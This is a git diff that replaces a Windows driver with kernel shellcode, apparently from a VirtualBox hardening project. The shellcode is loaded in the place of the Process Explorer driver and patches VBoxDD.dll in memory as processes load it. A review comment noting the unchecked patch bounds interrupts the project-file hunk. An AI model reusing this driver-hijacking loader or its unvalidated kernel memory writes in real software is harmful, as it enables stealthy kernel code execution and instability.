-* -*/ -NTSTATUS DriverEntry( - _In_ struct _DRIVER_OBJECT *DriverObject, - _In_ PUNICODE_STRING RegistryPath -) -{ -#ifndef _SIGNED_BUILD - UNICODE_STRING drvName; - - UNREFERENCED_PARAMETER(DriverObject); - UNREFERENCED_PARAMETER(RegistryPath); - - RtlInitUnicodeString(&drvName, TSUGUMI_DRV_OBJECT); - return IoCreateDriver(&drvName, &DriverInitialize); -#else - return DriverInitialize(DriverObject, RegistryPath); -#endif -} diff --git a/Source/Tsugumi/main.h b/Source/Tsugumi/main.h deleted file mode 100644 index c7448c6..0000000 --- a/Source/Tsugumi/main.h +++ /dev/null 
@@ -1,110 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2016 - 2017 -* -* TITLE: MAIN.H -* -* VERSION: 1.82 -* -* DATE: 20 Apr 2017 -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ - -#pragma once - -typedef struct _VBOX_PATCH { - KMUTEX Lock; // Synchronization mutex - PKEY_VALUE_PARTIAL_INFORMATION Chains; // bufer - ULONG_PTR ChainsLength; // buffer length in bytes -} VBOX_PATCH, *PVBOX_PATCH; - -typedef struct _BINARY_PATCH_BLOCK { - ULONG VirtualOffset; - UCHAR DataLength; - UCHAR Data[1]; -} BINARY_PATCH_BLOCK, *PBINARY_PATCH_BLOCK; - -NTKERNELAPI -NTSTATUS -IoCreateDriver( - IN PUNICODE_STRING DriverName, OPTIONAL - IN PDRIVER_INITIALIZE InitializationFunction -); - -_Dispatch_type_(IRP_MJ_DEVICE_CONTROL) -DRIVER_DISPATCH DevioctlDispatch; -_Dispatch_type_(IRP_MJ_CREATE) -_Dispatch_type_(IRP_MJ_CLOSE) -DRIVER_DISPATCH CreateCloseDispatch; - -_Dispatch_type_(IRP_MJ_CREATE) -_Dispatch_type_(IRP_MJ_CREATE_NAMED_PIPE) -_Dispatch_type_(IRP_MJ_CLOSE) -_Dispatch_type_(IRP_MJ_READ) -_Dispatch_type_(IRP_MJ_WRITE) -_Dispatch_type_(IRP_MJ_QUERY_INFORMATION) -_Dispatch_type_(IRP_MJ_SET_INFORMATION) -_Dispatch_type_(IRP_MJ_QUERY_EA) -_Dispatch_type_(IRP_MJ_SET_EA) -_Dispatch_type_(IRP_MJ_FLUSH_BUFFERS) -_Dispatch_type_(IRP_MJ_QUERY_VOLUME_INFORMATION) -_Dispatch_type_(IRP_MJ_SET_VOLUME_INFORMATION) -_Dispatch_type_(IRP_MJ_DIRECTORY_CONTROL) -_Dispatch_type_(IRP_MJ_FILE_SYSTEM_CONTROL) -_Dispatch_type_(IRP_MJ_DEVICE_CONTROL) -_Dispatch_type_(IRP_MJ_INTERNAL_DEVICE_CONTROL) -_Dispatch_type_(IRP_MJ_SHUTDOWN) -_Dispatch_type_(IRP_MJ_LOCK_CONTROL) -_Dispatch_type_(IRP_MJ_CLEANUP) -_Dispatch_type_(IRP_MJ_CREATE_MAILSLOT) 
-_Dispatch_type_(IRP_MJ_QUERY_SECURITY) -_Dispatch_type_(IRP_MJ_SET_SECURITY) -_Dispatch_type_(IRP_MJ_POWER) -_Dispatch_type_(IRP_MJ_SYSTEM_CONTROL) -_Dispatch_type_(IRP_MJ_DEVICE_CHANGE) -_Dispatch_type_(IRP_MJ_QUERY_QUOTA) -_Dispatch_type_(IRP_MJ_SET_QUOTA) -_Dispatch_type_(IRP_MJ_PNP) -DRIVER_DISPATCH UnsupportedDispatch; - -DRIVER_INITIALIZE DriverEntry; -DRIVER_INITIALIZE DriverInitialize; -DRIVER_UNLOAD DriverUnload; -NTSTATUS TsmiHandleMemWrite(_In_ PVOID SrcAddress, _In_ PVOID DestAddress, _In_ ULONG Size); -NTSTATUS TsmiLoadParameters(VOID); -NTSTATUS TsmiPatchImage(_In_ VBOX_PATCH *PatchInfo, _In_ PIMAGE_INFO ImageInfo); -NTSTATUS TsmiReadPatchChains(_In_ HANDLE sKey, _In_ PUNICODE_STRING ParamName, _In_ VBOX_PATCH *PatchInfo); -VOID TsmiPsImageHandler(_In_ PUNICODE_STRING FullImageName, _In_ HANDLE ProcessId, _In_ PIMAGE_INFO ImageInfo); -VOID TsmiListPatchChains(_In_ KEY_VALUE_PARTIAL_INFORMATION *PatchChains); -VOID TsmiCopyPatchChainsData(_In_ VBOX_PATCH *Src, _In_ VBOX_PATCH *Dst); - -#pragma alloc_text(INIT, DriverEntry) -#pragma alloc_text(INIT, DriverInitialize) -#pragma alloc_text(PAGE, TsmiLoadParameters) -#pragma alloc_text(PAGE, TsmiHandleMemWrite) -#pragma alloc_text(PAGE, TsmiPsImageHandler) -#pragma alloc_text(PAGE, TsmiPatchImage) -#pragma alloc_text(PAGE, TsmiCopyPatchChainsData) -#pragma alloc_text(PAGE, TsmiListPatchChains) -#pragma alloc_text(PAGE, TsmiReadPatchChains) -#pragma alloc_text(PAGE, DevioctlDispatch) -#pragma alloc_text(PAGE, CreateCloseDispatch) -#pragma alloc_text(PAGE, UnsupportedDispatch) -#pragma alloc_text(PAGE, DriverUnload) - -#define TSUGUMI_IOCTL_REFRESH_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0700, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) -#define TSUGUMI_IOCTL_MONITOR_STOP CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) - -#define TSUGUMI_TAG 'imsT' -#define BLOCK_DATA_OFFSET (ULONG_PTR)(&((PBINARY_PATCH_BLOCK)0)->Data) -#define TSUGUMI_DRV_OBJECT L"\\Driver\\TsmiDrv" -#define 
TSUGUMI_DEV_OBJECT L"\\Device\\Tsugumi" -#define TSUGUMI_SYM_LINK L"\\DosDevices\\Tsugumi" -#define TSUGUMI_PARAMS L"\\REGISTRY\\MACHINE\\SOFTWARE\\Tsugumi\\Parameters" - -#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER diff --git a/Source/Tsugumi/resource.h b/Source/Tsugumi/resource.h deleted file mode 100644 index 7ca31da..0000000 --- a/Source/Tsugumi/resource.h +++ /dev/null @@ -1,14 +0,0 @@ -//{{NO_DEPENDENCIES}} -// Microsoft Visual C++ generated include file. -// Used by Resource.rc - -// Next default values for new objects -// -#ifdef APSTUDIO_INVOKED -#ifndef APSTUDIO_READONLY_SYMBOLS -#define _APS_NEXT_RESOURCE_VALUE 101 -#define _APS_NEXT_COMMAND_VALUE 40001 -#define _APS_NEXT_CONTROL_VALUE 1001 -#define _APS_NEXT_SYMED_VALUE 101 -#endif -#endif diff --git a/Source/Tsugumi_shell/Tsugumi_shell.sln b/Source/Tsugumi_shell/Tsugumi_shell.sln new file mode 100644 index 0000000..0a8bdf1 --- /dev/null +++ b/Source/Tsugumi_shell/Tsugumi_shell.sln 
@@ -0,0 +1,51 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.29709.97 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tsugumi_shell", "Tsugumi_shell\Tsugumi_shell.vcxproj", "{C5E469AF-A1ED-4B35-98EF-128D984D7A73}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|ARM = Debug|ARM + Debug|ARM64 = Debug|ARM64 + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|ARM = Release|ARM + Release|ARM64 = Release|ARM64 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM.ActiveCfg = Debug|ARM + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM.Build.0 = Debug|ARM + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM.Deploy.0 = Debug|ARM + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM64.ActiveCfg = Debug|ARM64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM64.Build.0 = Debug|ARM64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|ARM64.Deploy.0 = Debug|ARM64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x64.ActiveCfg = Debug|x64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x64.Build.0 = Debug|x64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x64.Deploy.0 = Debug|x64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x86.ActiveCfg = Debug|Win32 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x86.Build.0 = Debug|Win32 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Debug|x86.Deploy.0 = Debug|Win32 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM.ActiveCfg = Release|ARM + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM.Build.0 = Release|ARM + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM.Deploy.0 = Release|ARM + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM64.ActiveCfg = Release|ARM64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM64.Build.0 = Release|ARM64 + 
{C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|ARM64.Deploy.0 = Release|ARM64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x64.ActiveCfg = Release|x64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x64.Build.0 = Release|x64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x64.Deploy.0 = Release|x64 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x86.ActiveCfg = Release|Win32 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x86.Build.0 = Release|Win32 + {C5E469AF-A1ED-4B35-98EF-128D984D7A73}.Release|x86.Deploy.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {41F0A6C0-9C5C-4208-A6E0-AAC2BB0284A9} + EndGlobalSection +EndGlobal diff --git a/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi.h b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi.h new file mode 100644 index 0000000..71312bf --- /dev/null +++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi.h 
@@ -0,0 +1,171 @@ +/* + +Tsugumi shellcode project + +File : Tsugumi.h +Modified : Wed Jan 29 2020, 22:30 + +*/ + +#pragma once + +#ifndef _TSUGUMI_H_ +#define _TSUGUMI_H_ + +#include + +typedef struct _BINARY_PATCH_BLOCK { + ULONG VirtualOffset; + UCHAR DataLength; + UCHAR Data[1]; +} BINARY_PATCH_BLOCK, * PBINARY_PATCH_BLOCK; + +#define BLOCK_DATA_OFFSET (ULONG_PTR)(&((PBINARY_PATCH_BLOCK)0)->Data) + +typedef _Check_return_ int(__cdecl* PFN_wcsnicmp)(_In_reads_or_z_(_MaxCount) const wchar_t* _Str1, _In_reads_or_z_(_MaxCount) const wchar_t* _Str2, _In_ size_t _MaxCount); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) PMDL (*PFN_IoAllocateMdl)( + _In_opt_ __drv_aliasesMem PVOID VirtualAddress, + _In_ ULONG Length, + _In_ BOOLEAN SecondaryBuffer, + _In_ BOOLEAN ChargeQuota, + _Inout_opt_ PIRP Irp +); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) VOID (*PFN_IoFreeMdl)( + PMDL Mdl +); + +typedef HANDLE (*PFN_PsGetCurrentProcessId)( + VOID +); + +typedef _Must_inspect_result_ _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS (*PFN_MmProtectMdlSystemAddress)( + _In_ PMDL MemoryDescriptorList, + _In_ ULONG NewProtect +); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) VOID (*PFN_MmUnmapLockedPages)( + _In_ PVOID BaseAddress, + _Inout_ PMDL MemoryDescriptorList +); + +typedef _IRQL_requires_max_(PASSIVE_LEVEL) NTSTATUS (*PFN_PsSetLoadImageNotifyRoutine)( + _In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine +); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) VOID (*PFN_MmUnlockPages)( + _Inout_ PMDL MemoryDescriptorList +); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) +_At_(MemoryDescriptorList->StartVa + MemoryDescriptorList->ByteOffset, + _Field_size_bytes_opt_(MemoryDescriptorList->ByteCount)) // Esp:823 Esp:829 + VOID (*PFN_MmProbeAndLockPages)( + _Inout_ PMDL MemoryDescriptorList, + _In_ KPROCESSOR_MODE AccessMode, + _In_ LOCK_OPERATION Operation + ); + +typedef _Post_writable_byte_size_(MemoryDescriptorList->ByteCount) +_When_(AccessMode == KernelMode, 
_IRQL_requires_max_(DISPATCH_LEVEL)) +_When_(AccessMode == UserMode, _Maybe_raises_SEH_exception_ _IRQL_requires_max_(APC_LEVEL) _Post_notnull_) +_At_(MemoryDescriptorList->MappedSystemVa, + _Post_writable_byte_size_(MemoryDescriptorList->ByteCount)) // Esp:829 + _Must_inspect_result_ + _Success_(return != NULL) + PVOID (*PFN_MmMapLockedPagesSpecifyCache)( + _Inout_ PMDL MemoryDescriptorList, + _In_ __drv_strictType(KPROCESSOR_MODE / enum _MODE, __drv_typeConst) + KPROCESSOR_MODE AccessMode, + _In_ __drv_strictTypeMatch(__drv_typeCond) MEMORY_CACHING_TYPE CacheType, + _In_opt_ PVOID RequestedAddress, + _In_ ULONG BugCheckOnFailure, + _In_ ULONG Priority // MM_PAGE_PRIORITY logically OR'd with MdlMapping* + ); + +typedef _IRQL_requires_max_(PASSIVE_LEVEL) +NTSTATUS (*PFN_PsSetLoadImageNotifyRoutine)( + _In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine +); + +typedef _IRQL_requires_max_(PASSIVE_LEVEL) +NTSTATUS (*PFN_PsRemoveLoadImageNotifyRoutine)( + _In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine +); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) +VOID (FASTCALL *PFN_IofCompleteRequest)( + _In_ PIRP Irp, + _In_ CCHAR PriorityBoost +); + +typedef _IRQL_requires_min_(PASSIVE_LEVEL) +_IRQL_requires_max_(APC_LEVEL) +NTSTATUS (*PFN_KeDelayExecutionThread)( + _In_ KPROCESSOR_MODE WaitMode, + _In_ BOOLEAN Alertable, + _In_ PLARGE_INTEGER Interval +); + +typedef _IRQL_requires_max_(DISPATCH_LEVEL) +_At_(DestinationString->Buffer, _Post_equal_to_(SourceString)) +_At_(DestinationString->Length, _Post_equal_to_(_String_length_(SourceString) * sizeof(WCHAR))) +_At_(DestinationString->MaximumLength, _Post_equal_to_((_String_length_(SourceString) + 1) * sizeof(WCHAR))) +VOID (NTAPI *PFN_RtlInitUnicodeString)( + _Out_ PUNICODE_STRING DestinationString, + _In_opt_z_ __drv_aliasesMem PCWSTR SourceString +); + +typedef _IRQL_requires_max_(PASSIVE_LEVEL) +NTSTATUS (*PFN_IoDeleteSymbolicLink)( + _In_ PUNICODE_STRING SymbolicLinkName +); + +typedef _IRQL_requires_max_(APC_LEVEL) 
+_Kernel_clear_do_init_(__yes) +VOID (*PFN_IoDeleteDevice)( + _In_ __drv_freesMem(Mem) PDEVICE_OBJECT DeviceObject +); + +VOID PsImageHandler( + _In_ PUNICODE_STRING FullImageName, + _In_ HANDLE ProcessId, + _In_ PIMAGE_INFO ImageInfo +); + +VOID DriverUnload( + _In_ PDRIVER_OBJECT DriverObject +); + +#define MAX_CONFIGURATION_DATA_SIZE 1024 + +typedef struct _MAPPED_CODE_DATA { + // Lock + ULONG fInititialized; + LONG iNotifyCounter; + + // API pointers + PFN_wcsnicmp _wcsnicmp; + PFN_IoAllocateMdl IoAllocateMdl; + PFN_IofCompleteRequest IofCompleteRequest; + PFN_IoFreeMdl IoFreeMdl; + PFN_IoDeleteDevice IoDeleteDevice; + PFN_IoDeleteSymbolicLink IoDeleteSymbolicLink; + PFN_KeDelayExecutionThread KeDelayExecutionThread; + PFN_PsGetCurrentProcessId PsGetCurrentProcessId; + PFN_PsSetLoadImageNotifyRoutine PsSetLoadImageNotifyRoutine; + PFN_PsRemoveLoadImageNotifyRoutine PsRemoveLoadImageNotifyRoutine; + PFN_MmProtectMdlSystemAddress MmProtectMdlSystemAddress; + PFN_MmUnmapLockedPages MmUnmapLockedPages; + PFN_MmUnlockPages MmUnlockPages; + PFN_MmProbeAndLockPages MmProbeAndLockPages; + PFN_MmMapLockedPagesSpecifyCache MmMapLockedPagesSpecifyCache; + PFN_RtlInitUnicodeString RtlInitUnicodeString; + + // data + ULONG ConfigurationDataSize; + UCHAR ConfigurationData[MAX_CONFIGURATION_DATA_SIZE]; +} MAPPED_CODE_DATA, * PMAPPED_CODE_DATA; + +#endif /* _TSUGUMI_H_ */ \ No newline at end of file diff --git a/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj new file mode 100644 index 0000000..0b72815 --- /dev/null +++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj 
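Review bot: `PFN_PsSetLoadImageNotifyRoutine` is typedef'd twice in this header (once right after `PFN_MmUnmapLockedPages`, again after `PFN_MmMapLockedPagesSpecifyCache`); an identical typedef redeclaration is accepted by MSVC in C mode, but the second copy should be dropped. The `MAPPED_CODE_DATA` fields also carry no contract for whoever fills the block from user mode: `fInititialized` is labelled `// Lock` although it is a plain ULONG that its consumer reads and then writes without any interlocked operation, and nothing states that `ConfigurationData` is a back-to-back sequence of `BINARY_PATCH_BLOCK` records whose every header plus `DataLength` must lie within `ConfigurationDataSize`, itself at most `MAX_CONFIGURATION_DATA_SIZE`. I would replace `// Lock` with `// One-shot init flag, not a lock: checked-then-set without synchronization by the IRP handler; iNotifyCounter is the only field used with Interlocked* ops` and put `// Packed BINARY_PATCH_BLOCK records; the writer must guarantee each BLOCK_DATA_OFFSET + DataLength fits inside ConfigurationDataSize (<= MAX_CONFIGURATION_DATA_SIZE)` above `ConfigurationDataSize`, since the kernel side does not validate this.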
@@ -0,0 +1,214 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + Debug + ARM + + + Release + ARM + + + Debug + ARM64 + + + Release + ARM64 + + + + {C5E469AF-A1ED-4B35-98EF-128D984D7A73} + {1bc93793-694f-48fe-9372-81e2b05556fd} + v4.5 + 12.0 + Debug + Win32 + Tsugumi_shell + $(LatestTargetPlatformVersion) + + + + Windows10 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windows10 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windows10 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windows10 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + false + + + Windows10 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windows10 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windows10 + true + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + Windows10 + false + WindowsKernelModeDriver10.0 + Driver + KMDF + Universal + + + + + + + + + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + false + AllRules.ruleset + false + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + true + + + DbgengKernelDebugger + .\output\$(Platform)\$(Configuration)\ + .\output\$(Platform)\$(Configuration)\ + true + 
true + + + + None + false + true + MaxSpeed + Speed + false + false + false + false + CompileAsC + true + + + false + false + true + true + true + true + Default + DriverMain + true + true + /INTEGRITYCHECK /ORDER:@fnorder.txt %(AdditionalOptions) + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Source/Tsugumi/Tsugumi.vcxproj.filters b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.filters similarity index 82% rename from Source/Tsugumi/Tsugumi.vcxproj.filters rename to Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.filters index a738ade..50f9bea 100644 --- a/Source/Tsugumi/Tsugumi.vcxproj.filters +++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.filters @@ -24,16 +24,8 @@ - + Header Files - - Header Files - - - - - Resource Files - \ No newline at end of file diff --git a/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.user b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.user new file mode 100644 index 0000000..b2a2bcc --- /dev/null +++ b/Source/Tsugumi_shell/Tsugumi_shell/Tsugumi_shell.vcxproj.user @@ -0,0 +1,6 @@ + + + + Off + + \ No newline at end of file diff --git a/Source/Tsugumi_shell/Tsugumi_shell/fnorder.txt b/Source/Tsugumi_shell/Tsugumi_shell/fnorder.txt new file mode 100644 index 0000000..4bc7ffb --- /dev/null +++ b/Source/Tsugumi_shell/Tsugumi_shell/fnorder.txt @@ -0,0 +1,4 @@ +DriverMain +DriverUnload +HandleUserMemWrite +PsImageHandler \ No newline at end of file diff --git a/Source/Tsugumi_shell/Tsugumi_shell/main.c b/Source/Tsugumi_shell/Tsugumi_shell/main.c new file mode 100644 index 0000000..d32a107 --- /dev/null +++ b/Source/Tsugumi_shell/Tsugumi_shell/main.c 
@@ -0,0 +1,159 @@
+/*
+
+Tsugumi shellcode project
+
+File : main.c
+Modified : Wed Jan 29 2020, 22:30
+
+*/
+#include
+#include
+#include "Tsugumi.h"
+/*
+ disable C6320 "Exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER.
+ This might mask exceptions that were not intended to be handled."
+*/
+#pragma warning(disable: 6320)
+NTSTATUS DriverMain(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
+{
+ volatile const PMAPPED_CODE_DATA ShellEnvBlock =
+ (PMAPPED_CODE_DATA)(ULONG_PTR)0x1337c0de1cedc01a; // Magic pattern to search and replace
+ volatile PVOID fnptr = (PVOID)&DriverUnload; // hack to prevent unreferenced code elimination
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(fnptr);
+ if (ShellEnvBlock->fInititialized != 1) // We should use a fast mutex here, but we can't properly initialize it in shell code.
+ {
+ ShellEnvBlock->fInititialized = 1;
+ ShellEnvBlock->PsSetLoadImageNotifyRoutine(PsImageHandler); // PsImageHandler referenced by relative addressing. No need to fix.
+ }
+
+ Irp->IoStatus.Status = STATUS_SUCCESS;
+ ShellEnvBlock->IofCompleteRequest(Irp, IO_NO_INCREMENT);
+ return STATUS_SUCCESS;
+}
+
+VOID DriverUnload(
+ _In_ PDRIVER_OBJECT DriverObject
+)
+{
+ volatile const PMAPPED_CODE_DATA ShellEnvBlock =
+ (PMAPPED_CODE_DATA)(ULONG_PTR)0x1337c0de1cedc01a; // Magic pattern to search and replace
+
+ LARGE_INTEGER t;
+ UNICODE_STRING sl;
+ WCHAR sl_name[23] = {
+ L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i',L'c', L'e', L's',
+ L'\\', L'P', L'R', L'O', L'C', L'E', L'X', L'P',L'1', L'5', L'2', L'\0'
+ };
+ // \DosDevices\PROCEXP152
+
+ ShellEnvBlock->PsRemoveLoadImageNotifyRoutine(PsImageHandler);
+ ShellEnvBlock->RtlInitUnicodeString(&sl, sl_name);
+ ShellEnvBlock->IoDeleteSymbolicLink(&sl);
+ ShellEnvBlock->IoDeleteDevice(DriverObject->DeviceObject);
+
+ t.QuadPart = -100000ll; // 0.1 sec
+ while (ShellEnvBlock->iNotifyCounter != 0)
+ ShellEnvBlock->KeDelayExecutionThread(KernelMode, FALSE, &t);
+
+ ShellEnvBlock->KeDelayExecutionThread(KernelMode, FALSE, &t);
+}
+
+NTSTATUS HandleUserMemWrite(
+ _In_ PMAPPED_CODE_DATA ShellEnvBlock,
+ _In_ PVOID SrcAddress,
+ _In_ PVOID DestAddress,
+ _In_ ULONG Size)
+{
+ PMDL mdl;
+ NTSTATUS status = STATUS_SUCCESS;
+
+ mdl = ShellEnvBlock->IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
+ if (mdl == NULL)
+ return STATUS_INSUFFICIENT_RESOURCES;
+
+ __try {
+ if ((ULONG_PTR)DestAddress >= 0x7FFFFFFFFFFFull)
+ return STATUS_CONFLICTING_ADDRESSES;
+
+ ShellEnvBlock->MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
+ // DestAddress = ShellEnvBlock->MmGetSystemAddressForMdlSafe(mdl, HighPagePriority | MdlMappingNoExecute);
+
+ // begin MmGetSystemAddressForMdlSafe copy-paste
+ if (mdl->MdlFlags & (MDL_MAPPED_TO_SYSTEM_VA | MDL_SOURCE_IS_NONPAGED_POOL)) {
+ DestAddress = mdl->MappedSystemVa;
+ }
+ else {
+ DestAddress = ShellEnvBlock->MmMapLockedPagesSpecifyCache(mdl, KernelMode, MmCached,
+ NULL, FALSE, HighPagePriority | MdlMappingNoExecute);
+ }
+ // end MmGetSystemAddressForMdlSafe copy-paste
+
+ if (DestAddress != NULL) {
+ status = ShellEnvBlock->MmProtectMdlSystemAddress(mdl, PAGE_READWRITE);
+ __movsb((PUCHAR)DestAddress, (const UCHAR*)SrcAddress, Size); // intrinsic
+ ShellEnvBlock->MmUnmapLockedPages(DestAddress, mdl);
+ ShellEnvBlock->MmUnlockPages(mdl);
+ }
+ else {
+ status = STATUS_ACCESS_VIOLATION;
+ }
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ status = STATUS_ACCESS_VIOLATION;
+ }
+
+ ShellEnvBlock->IoFreeMdl(mdl);
+ return status;
+}
+
+VOID PsImageHandler(
+ _In_ PUNICODE_STRING FullImageName,
+ _In_ HANDLE ProcessId,
+ _In_ PIMAGE_INFO ImageInfo
+)
+{
+ volatile const PMAPPED_CODE_DATA ShellEnvBlock =
+ (PMAPPED_CODE_DATA)(ULONG_PTR)0x1337c0de1cedc01a; // Magic pattern to search and replace
+
+ InterlockedIncrement(&ShellEnvBlock->iNotifyCounter);
+
+ PBINARY_PATCH_BLOCK PatchChains;
+ ULONG c, l = 0;
+ WCHAR TargetDllName[11] = {
+ L'V', L'B', L'o', L'x', L'D', L'D', L'.', L'd',L'l', L'l', L'\0'
+ };
+
+ while ((FullImageName != NULL) && (ImageInfo != NULL) && (ShellEnvBlock->PsGetCurrentProcessId() == ProcessId))
+ {
+ if ((FullImageName->Buffer == NULL) || (FullImageName->Length == 0))
+ break;
+
+ for (c = 0; c < (ULONG)FullImageName->Length / 2; ++c)
+ if (FullImageName->Buffer[c] == '\\')
+ l = c + 1;
+
+ if (ShellEnvBlock->_wcsnicmp(&FullImageName->Buffer[l], TargetDllName, wcslen(TargetDllName)) == 0) { // wcslen got inlined
+ l = 0;
+ PatchChains = (PBINARY_PATCH_BLOCK)&ShellEnvBlock->ConfigurationData;
+
+ while (l + BLOCK_DATA_OFFSET < ShellEnvBlock->ConfigurationDataSize) {
+ if (PatchChains->DataLength != 0)
+ // HandleUserMemWrite called by relative addressing. No need to fix.
+ HandleUserMemWrite(ShellEnvBlock, PatchChains->Data,
+ (PVOID)((ULONG_PTR)ImageInfo->ImageBase + PatchChains->VirtualOffset), PatchChains->DataLength);
+ l += BLOCK_DATA_OFFSET + PatchChains->DataLength;
+ PatchChains = (PBINARY_PATCH_BLOCK)((ULONG_PTR)PatchChains + BLOCK_DATA_OFFSET + PatchChains->DataLength);
+ }
+ }
+
+ break;
+ }
+
+ InterlockedDecrement(&ShellEnvBlock->iNotifyCounter);
+}
diff --git a/Source/Zekamashi/loader/Resource.rc b/Source/Zekamashi/loader/Resource.rc
deleted file mode 100644
index 3ff5c7a..0000000
Binary files a/Source/Zekamashi/loader/Resource.rc and /dev/null differ
diff --git a/Source/Zekamashi/loader/cui.c b/Source/Zekamashi/loader/cui.c
deleted file mode 100644
index 9ce5dcd..0000000
--- a/Source/Zekamashi/loader/cui.c
+++ /dev/null
